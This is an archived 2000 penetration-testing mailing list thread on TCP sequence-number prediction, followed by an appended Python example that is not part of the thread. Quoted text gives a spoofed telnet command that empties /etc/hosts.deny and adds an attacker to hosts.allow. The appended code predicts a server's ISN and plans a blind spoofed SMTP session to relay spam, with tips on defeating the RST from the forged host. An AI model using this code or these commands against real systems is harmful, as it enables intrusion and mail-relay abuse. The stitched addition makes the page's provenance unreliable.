Penetration Testing mailing list archives

Re: [PEN-TEST] Exploiting sequence number predictability


From: Pedro Quintanilha <quinta () CERTBR COM BR>
Date: Tue, 22 Aug 2000 23:11:23 -0300

Another easy to implement exploit is to send SPAM through an SMTP server
that restricts relaying only by source IP... again, it's easy only
if the target server is Windoze, thanks to M$'s lack of vision about
TCP sequence number prediction.

As the SMTP protocol is very simple, it's very simple to exploit in this way.


[]'s

Pedro Quintanilha
quinta () certbr com br



Jean-Simon Durand wrote:

sirc3 does something very close to that.

It is a very old technique (2-3 years old at least) and it is rarely used
today (I think) because the sequence numbers on most Unix systems are
unpredictable. Most Windows systems are still vulnerable.

sirc was made with irc in mind but if I remember correctly, it works with
the telnet daemon. It tries to guess the sequence numbers to establish a tcp
connection with any source IP address.

I attached (uuencoded) a copy of the source code for sirc3. I played with it
a very long time ago so I'm not even sure if it needs modification to
compile. If I remember correctly, it's for Linux but it can certainly be
ported to other OS's.

Have fun!

Jean-Simon Durand
Montreal, Quebec, Canada

----- Original Message -----
From: "Dawes, Rogan" <rdawes () DELOITTE CO ZA>
To: <PEN-TEST () SECURITYFOCUS COM>
Sent: Friday, August 18, 2000 8:37 AM
Subject: [PEN-TEST] Exploiting sequence number predictability

[snip]

I imagine it is a case of:
1. determine the predictability algorithm (64k rule, or whatever)
2. Craft the packets required to execute the commands desired with the IP
address of a permitted workstation.
(packet 1 : SYN
 packet 2 : ACK xxxxx/username^M
 packet 3 : ACK xxxxy/password^M
 packet 4 : ACK xxxxz/echo > /etc/hosts.deny; echo attacker >>
/etc/hosts.allow; exit^M, or whatever)
 where xxxxx-xxxxz are determined by the ISN, the number of bytes in the
banner and login prompt, password prompt, and welcome banner/motd)

[Attachment: sirc3.tar.gz.uu (application/x-compressed, quoted-printable)]
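The procedure Rogan lists above (work out the ISN increment from a few probe connections, then pre-compute the SEQ/ACK numbers of every spoofed segment because the server's replies never come back to the attacker), worked through for the SMTP relay case Pedro describes. This is an added example, not code from the thread or from sirc3; the probe ISNs, the 64000 step, the server replies and all host names are constructed for the illustration.

```python
"""Blind, spoofed-source TCP session against a host with a predictable ISN
generator: the attack the thread sketches (sirc3-style), worked through for
the SMTP relay case.  Added example; not code from the thread or from sirc3.
The ISN samples and server replies are constructed, not captured."""

from typing import NamedTuple

MOD = 1 << 32  # TCP sequence space wraps at 2^32


class Segment(NamedTuple):
    flags: str
    seq: int
    ack: int
    data: bytes


def isn_increment(isns):
    """Per-connection ISN increment if the samples follow a linear rule such as
    the '64k rule' (constant step per accepted connection); None otherwise.
    The samples come from probe connections the attacker made in its own name."""
    if len(isns) < 3:
        return None
    deltas = {(b - a) % MOD for a, b in zip(isns, isns[1:])}
    return deltas.pop() if len(deltas) == 1 else None


def predict_next_isn(isns):
    """ISN the target will hand the next connection it accepts, assuming the
    linear rule holds and nobody else connects in between (a blind assumption)."""
    inc = isn_increment(isns)
    return None if inc is None else (isns[-1] + inc) % MOD


def plan_blind_session(server_isn, client_isn, dialogue):
    """Segment train for a session whose replies never reach us.

    dialogue: (expected_server_reply, client_command) pairs in order.  The
    reply text is what a probe connection got back; only its length matters,
    because that length is what advances our ACK number.  Each command must be
    sent only after the server has had time to emit the reply it acknowledges.
    """
    segments = [Segment("SYN", client_isn, 0, b"")]
    seq = (client_isn + 1) % MOD  # our SYN consumed one sequence number
    ack = (server_isn + 1) % MOD  # so did the SYN/ACK we never see
    # Finish the handshake with a bare ACK: acknowledging the banner before the
    # server has sent it would put the ACK number outside the window.
    segments.append(Segment("ACK", seq, ack, b""))
    for reply, command in dialogue:
        ack = (ack + len(reply)) % MOD  # swallow the unseen reply
        segments.append(Segment("PSH|ACK", seq, ack, command))
        seq = (seq + len(command)) % MOD
    return segments


# Constructed samples: four probe connections to the target, 64000 apart.
PROBE_ISNS = [0x10000000, 0x1000FA00, 0x1001F400, 0x1002EE00]

# Constructed replies from a probe session; the relay decision is made on the
# source IP, which is exactly what the spoofed SYN forges.
SMTP_DIALOGUE = [
    (b"220 mail.example.test ESMTP ready\r\n", b"HELO relay.example.test\r\n"),
    (b"250 mail.example.test\r\n", b"MAIL FROM:<sender@example.test>\r\n"),
    (b"250 OK\r\n", b"RCPT TO:<victim@example.test>\r\n"),
    (b"250 OK\r\n", b"DATA\r\n"),
    (b"354 End data with <CR><LF>.<CR><LF>\r\n", b"Subject: test\r\n\r\nbody\r\n.\r\n"),
    (b"250 OK queued\r\n", b"QUIT\r\n"),
]


if __name__ == "__main__":
    nxt = predict_next_isn(PROBE_ISNS)
    print(f"per-connection increment: {isn_increment(PROBE_ISNS)}")
    print(f"predicted server ISN:     {nxt:#010x}")
    for s in plan_blind_session(nxt, 0x1000, SMTP_DIALOGUE):
        print(f"{s.flags:8} seq={s.seq:#010x} ack={s.ack:#010x} {s.data!r}")
```

Two things the plan above cannot take care of by itself, and which decide whether the attack works in practice: the host whose address is being forged will answer the unexpected SYN/ACK with a RST unless it is down or cannot answer, which tears the half-open connection down before the first command arrives; and the predicted ISN is only right if no other connection reaches the target between the last probe and the spoofed SYN, so the probes and the attack have to be sent back to back.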

